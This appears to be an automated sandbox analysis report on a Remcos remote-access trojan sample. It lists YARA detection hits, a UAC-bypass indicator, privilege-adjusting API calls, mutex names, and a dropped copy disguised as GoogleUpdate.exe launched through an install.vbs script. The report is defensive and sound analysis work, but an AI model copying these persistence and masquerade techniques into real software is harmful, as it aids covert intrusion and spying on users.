Source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000003.1665273424.000000000054C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe
Source: Process Memory Space: DB5rQYsfd6.exe PID: 7308, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: GoogleUpdate.exe PID: 7888, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: svchost.exe PID: 7944, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: GoogleUpdate.exe PID: 8112, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: GoogleUpdate.exe PID: 8180, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: GoogleUpdate.exe PID: 1184, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: GoogleUpdate.exe PID: 1608, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: GoogleUpdate.exe PID: 7592, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: GoogleUpdate.exe PID: 7844, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPED	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPED	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer author = ditekSHen, description = detects Windows exceutables potentially bypassing UAC using eventvwr.exe

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@26/4@49/1

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: 0_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	0_2_00415C90
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 10_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	10_2_00415C90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 13_2_02D65C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	13_2_02D65C90
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 15_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	15_2_00415C90
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: 18_2_00415C90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	18_2_00415C90

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_0040E2E7 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,CloseHandle,

0_2_0040E2E7

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_00419493 FindResourceA,LoadResource,LockResource,SizeofResource,

0_2_00419493

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_00418A00 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

0_2_00418A00

Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Attempt-S4A0CI-W
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Mutant created: \Sessions\1\BaseNamedObjects\Attempt-S4A0CI
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

File created: C:\Users\user\AppData\Local\Temp\install.vbs

Jump to behavior

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\install.vbs"

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: Software\	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: Attempt-S4A0CI	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: Exe	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: Exe	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: Attempt-S4A0CI	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: (#G	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: Inj	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: Inj	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: Inj	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: Attempt-S4A0CI	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: origmsc	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: h5S	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: h5S	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: h5S	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: @8T	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: h5S	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: exepath	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: @8T	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: exepath	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: h5S	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: licence	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: `"G	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: Administrator	0_2_0040D3F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Command line argument: User	0_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Software\	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Attempt-S4A0CI	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Exe	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Exe	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Attempt-S4A0CI	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: (#G	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Inj	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Inj	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Inj	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: Attempt-S4A0CI	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: origmsc	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: 0gj	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: 0gj	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: 0gj	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: H"G	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: 0gj	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: exepath	10_2_0040D3F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Command line argument: H"G	10_2_0040D3F0
